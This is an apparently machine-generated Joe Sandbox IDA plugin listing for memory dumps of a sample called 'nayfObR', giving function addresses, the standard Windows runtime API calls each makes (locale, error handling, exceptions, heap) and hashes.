Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b032498c4f48ce681b2423ea32b41827d7139e4222597b2c720dc20a6d5affd8
Instruction ID: c2133ec80cb28089305a802fd0b30cde1986659b6977bc7f24f2838c592a3bc0
Opcode Fuzzy Hash: b032498c4f48ce681b2423ea32b41827d7139e4222597b2c720dc20a6d5affd8
Instruction Fuzzy Hash: 0A11A072611607ABDB29AF28DD46AFA7BE8FF48320B10406AF501D7141EB38FD04DB61

Function 005BA588 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

EnumSystemLocalesW.KERNEL32(005BA630,00000001,00000000,?,-00000050,?,005BA413,00000000,-00000002,00000000,?,00000055,?), ref: 005BA5FA

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: dd3cb0c38836ae431e22392331372d7fc1817867427fd46a520d8c3a1ad5d433
Instruction ID: 8d9eb328144c13e3521b62d3e6d7dd0d2fea1531e9bb26d2d82af5140136a117
Opcode Fuzzy Hash: dd3cb0c38836ae431e22392331372d7fc1817867427fd46a520d8c3a1ad5d433
Instruction Fuzzy Hash: C711E53A6007055FDF289F39C8A16BABF92FF84358B19842DE94687A40E771B943C740

Function 005BABBD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005BA99A,00000000,00000000,?), ref: 005BABE9

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 2455221899cd936053ddca4176732d5f19a5adf021c01c467089987a6500b43f
Instruction ID: adaf12c8c8110b3d77624c12c2e03891c59d9781391dfbbaac83272f9e7ee258
Opcode Fuzzy Hash: 2455221899cd936053ddca4176732d5f19a5adf021c01c467089987a6500b43f
Instruction Fuzzy Hash: FA01F936A10212ABDB285A248C46BFA7F68FB40754F154828FC06A3180FB34FE41CA91

Function 005BA883 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

EnumSystemLocalesW.KERNEL32(005BA8F0,00000001,?,?,-00000050,?,005BA3DB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 005BA8CD

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 12cc5b5be249366217e2abb0bdda2a7a0f0375e5f1b69f41a697117f7ef9f834
Instruction ID: e33451b79d95708130b36f7b7901f1989ffead7648bf6386e243cd6cfc491877
Opcode Fuzzy Hash: 12cc5b5be249366217e2abb0bdda2a7a0f0375e5f1b69f41a697117f7ef9f834
Instruction Fuzzy Hash: 93F0F6363007056FDB255F79D885ABABF95FF80368B05842DF9464BA80D671BC43D750

Function 005B61FD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B18E1: EnterCriticalSection.KERNEL32(?,?,005B56D8,?,005CFCF8,00000008,005B55CA,00000000,00000000,?), ref: 005B18F0

EnumSystemLocalesW.KERNEL32(005B61F0,00000001,005CFD78,0000000C,005B5BF1,-00000050), ref: 005B6235

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: ad04c2600839e47ecd9c9b0362717928179111fe783d04507b9f8788f057a46a
Instruction ID: 63edb0dc7fe309661044138c37c31bf57725543afd93d395cf4cdaec209376db
Opcode Fuzzy Hash: ad04c2600839e47ecd9c9b0362717928179111fe783d04507b9f8788f057a46a
Instruction Fuzzy Hash: 36F03736A41605EFD710DF98E846BAC7BB0FB45721F10812BF410DB2A1C7755904AF94

Function 005BA9C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0

EnumSystemLocalesW.KERNEL32(005BAA10,00000001,?,?,?,005BA435,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 005BA9FC

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 3c165192e3d9b8e5e622c4022ad5d10b1e91cdeadd842866aec0aabfc0ebbfe0
Instruction ID: 046a8fb466b7e0cb5d13ae4b8a8d72fa3bcc03fe41ec1c3fa378d1ee91656866
Opcode Fuzzy Hash: 3c165192e3d9b8e5e622c4022ad5d10b1e91cdeadd842866aec0aabfc0ebbfe0
Instruction Fuzzy Hash: EDF02B3A30024567CB149F36D856BBABF94FFC1750B07405AFE058B250C671A843D7A0

Function 005B5CF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,005B0633,?,20001004,00000000,00000002,?,?,005AF541), ref: 005B5D29

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b6b76f7def79870dc859d921e0b2117c47c1b7bb0e0b1d248a03d25b1d5f282a
Instruction ID: ce720d63b8d677271e772910c4c209cf8ab9f4e8f62f23c7f1ac584b42eebbbb
Opcode Fuzzy Hash: b6b76f7def79870dc859d921e0b2117c47c1b7bb0e0b1d248a03d25b1d5f282a
Instruction Fuzzy Hash: F4E04F31500A5EBFCF162F61DC09FEE3F1AFF94760F144520FC0665121DB329A20AA91

Function 005A9637 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009760), ref: 005A963C

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b866200dd709933610ea842baed8ac54087039de3713b7e76bc07c46200ba443
Instruction ID: e2d3a056b571c7a62ae93b94e41db08ba08963e1ba6b3e78e81c332a75ac3571
Opcode Fuzzy Hash: b866200dd709933610ea842baed8ac54087039de3713b7e76bc07c46200ba443
Instruction Fuzzy Hash:

Function 005B6920 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 005B6920

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9cd2adb8132c3e0b0a9f17472e6d567001bf0bb1ed74c7b4ff120f36395f38f0
Instruction ID: 7b6405dd3077170831043378a9990dbb778b5502e3ffbda9fdbc3257b1ca9f4f
Opcode Fuzzy Hash: 9cd2adb8132c3e0b0a9f17472e6d567001bf0bb1ed74c7b4ff120f36395f38f0
Instruction Fuzzy Hash: 50A00270607641CF57908F755A09619369D65655D174540575405D5160D6344454AF11

Function 005A1C80 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2494390e9c9e37c2cafb6e98cebbe4d00908eadf6dfded3b6a887e212125cb6
Instruction ID: 86878dd0ed6852fd8ee464463c84ec18fb70c0ae743651a1428f62a74692673e
Opcode Fuzzy Hash: b2494390e9c9e37c2cafb6e98cebbe4d00908eadf6dfded3b6a887e212125cb6
Instruction Fuzzy Hash: BCD0923A642A58AFC610CF89E440D41F7B8FB9E770B154167EA4893B20C331FC11CAE0

Function 005C3DD2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0343FDA8,0343FDA8,00000000,7FFFFFFF,?,005C3DBD,0343FDA8,0343FDA8,00000000,0343FDA8,?,?,?,?,0343FDA8,00000000), ref: 005C3E78
__alloca_probe_16.LIBCMT ref: 005C3F33
__alloca_probe_16.LIBCMT ref: 005C3FC2
__freea.LIBCMT ref: 005C400D
__freea.LIBCMT ref: 005C4013
__freea.LIBCMT ref: 005C4049
__freea.LIBCMT ref: 005C404F
__freea.LIBCMT ref: 005C405F

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 814dfa175efc55140301023d1c1360b75c86bdb3c70b46ec0443191794676345
Instruction ID: 5ae4cc0a59b6bbd2fe29bf6f2529453f27ff6d86574e071abfd2f126b5a6312b
Opcode Fuzzy Hash: 814dfa175efc55140301023d1c1360b75c86bdb3c70b46ec0443191794676345
Instruction Fuzzy Hash: E971E37294024A9FDF219FD48C5AFAE7FA9FF89310F14441DEA14BB282D7759D008BA0

Function 005B7EB6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005B7F3C

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 42ea02ea6af84237a2797da9c4c1132f2af8d53638729ead8d1b6fe62c757f4b
Instruction ID: 32572e2e408379e99aa1f94b3d54e74a911d5f448b2661dd972cf2dd12521584
Opcode Fuzzy Hash: 42ea02ea6af84237a2797da9c4c1132f2af8d53638729ead8d1b6fe62c757f4b
Instruction Fuzzy Hash: F7B15772A0525A9FDB118F68CC86BFE7FA9FF99350F144155E804AF282D674F901CBA0

Function 005B464C Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 005B476B
CallUnexpected.LIBVCRUNTIME ref: 005B49E4

Strings

csm, xrefs: 005B46F6
csm, xrefs: 005B47A2
xf\, xrefs: 005B4762
csm, xrefs: 005B4689

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xf\
API String ID: 2673424686-3673733494
Opcode ID: e3deb8c9678936d63823150d13d45668702ca8decb16ed92025f19fd696cf964
Instruction ID: e1fd9df878f348930f25092a0c48b38c4aeadfc463ca54de358cef1296af5e37
Opcode Fuzzy Hash: e3deb8c9678936d63823150d13d45668702ca8decb16ed92025f19fd696cf964
Instruction Fuzzy Hash: 62B1547580021AAFCF28DFA4C8859EEBFB5FF45310F14856AE8156B212D731EA51CF91

Function 005AA780 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005AA7B7
___except_validate_context_record.LIBVCRUNTIME ref: 005AA7BF
_ValidateLocalCookies.LIBCMT ref: 005AA848
__IsNonwritableInCurrentImage.LIBCMT ref: 005AA873
_ValidateLocalCookies.LIBCMT ref: 005AA8C8

Strings

csm, xrefs: 005AA85D

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 853cea4275886a3bce44f2d4e9996e77415b6d33d33330b3a755385b5e7c139f
Instruction ID: 79d62b735c8941b926d666d91c4eabe3702782c21876689295886e9fc8398e44
Opcode Fuzzy Hash: 853cea4275886a3bce44f2d4e9996e77415b6d33d33330b3a755385b5e7c139f
Instruction Fuzzy Hash: 7041C734E0021A9FCF10DF68D884AAE7FB5FF46314F148055E9159B356D735AA06CF92

Function 005C2A3C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b058fe5eca1fbc4fc0023cbd903b6812c7843067580968b9e3728c416a69c38
Instruction ID: 57f271c8bdb77d7581fd550a551aab1204b9c175f42b45becb6a900eb7e9074f
Opcode Fuzzy Hash: 2b058fe5eca1fbc4fc0023cbd903b6812c7843067580968b9e3728c416a69c38
Instruction Fuzzy Hash: 8BB1D170A0424AAFDB21DFE8C885FAE7FB5BFA5310F14415DE501AB292C770AD42CB61

Function 005B3D74 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005B3D6B,005AA54D,005A97A4), ref: 005B3D82
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B3D90
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B3DA9
SetLastError.KERNEL32(00000000,005B3D6B,005AA54D,005A97A4), ref: 005B3DFB

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: da93ab33afd6f6065cc064069bd4fc27857fd74ae0abc67431f93caf867d97f8
Instruction ID: 5fb580e5ee689a5113d2b08409a927a3e123227ec031c78e7498c46c44772b44
Opcode Fuzzy Hash: da93ab33afd6f6065cc064069bd4fc27857fd74ae0abc67431f93caf867d97f8
Instruction Fuzzy Hash: D401DD322067135EE7241778ECCA5EB2F54FB523B4F20063BF410B60E2EE116D05E640

Function 005AEDC8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9BCBA9B0,?,?,00000000,005C5334,000000FF,?,005AEE89,?,?,005AEF25,00000000), ref: 005AEDFD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005AEE0F
FreeLibrary.KERNEL32(00000000,?,?,00000000,005C5334,000000FF,?,005AEE89,?,?,005AEF25,00000000), ref: 005AEE31

Strings

mscoree.dll, xrefs: 005AEDF6
CorExitProcess, xrefs: 005AEE07

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0ff908f237e84f6f75ce278d06f9e5880ec35980e4187449b13dde386b458da7
Instruction ID: b61ebb1c9409fc7cbcc1294226f7d171eb821d6159d0bf5c1f0d4767e1cff2ae
Opcode Fuzzy Hash: 0ff908f237e84f6f75ce278d06f9e5880ec35980e4187449b13dde386b458da7
Instruction Fuzzy Hash: A001D632A51A59AFDB118F94DC0AFBFBFBCFB05B11F000529F811A22D0DB74A804CA80

Function 005A7382 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005A7389
std::_Lockit::_Lockit.LIBCPMT ref: 005A7394
std::_Lockit::~_Lockit.LIBCPMT ref: 005A7402

Part of subcall function 005A727F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005A7297

std::locale::_Setgloballocale.LIBCPMT ref: 005A73AF
_Yarn.LIBCPMT ref: 005A73C5

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
